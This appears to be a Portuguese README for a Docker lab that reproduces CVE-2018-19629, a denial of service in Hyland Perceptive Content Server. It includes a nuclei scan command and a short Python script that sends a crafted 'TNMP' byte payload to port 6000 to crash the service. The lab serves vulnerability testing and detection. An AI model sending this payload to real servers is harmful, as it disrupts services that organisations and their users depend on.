
Hyland Perceptive Content Server - Negação de Serviço
Ambiente de teste Docker para CVE-2018-19629 - Negação de Serviço no Hyland Perceptive Content Server.
| Campo | Valor |
|---|---|
| ID CVE | CVE-2018-19629 |
| Severidade | Alta (DoS) |
| Versões Afetadas | Hyland Perceptive Content Server < 7.1.5 |
| Versão Corrigida | 7.1.5 |
O Hyland Perceptive Content Server anterior à versão 7.1.5 contém uma vulnerabilidade de negação de serviço causada pela falha do serviço ImageNow Server através de uma conexão TCP. Atacantes podem interromper o serviço enviando pacotes TCP especialmente criados contendo a sequência de cabeçalho TNMP.
# Inicie o ambiente vulnerável
docker-compose up -d
# Verifique se está ouvindo
# (Talvez seja necessário netcat ou similar)
nc -zv localhost 6000
# Teste com o template nuclei
nuclei -t ../network/cves/2018/CVE-2018-19629.yaml -u localhost:6000
Você pode provocar a falha manualmente usando Python:
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("localhost", 6000))
# O pacote malicioso
payload = b'\x54\x4e\x4d\x50\x04\x00\x00\x00\x54\x4e\x4d\x45\x00\x00\x04\x00'
s.send(payload)
s.close()
Verifique os logs para ver a falha:
docker logs -f imagenow-vuln
Você deve ver: [!] CRITICAL: Recevied malicious 'TNMP' packet... seguido pelo container reiniciando.
docker-compose down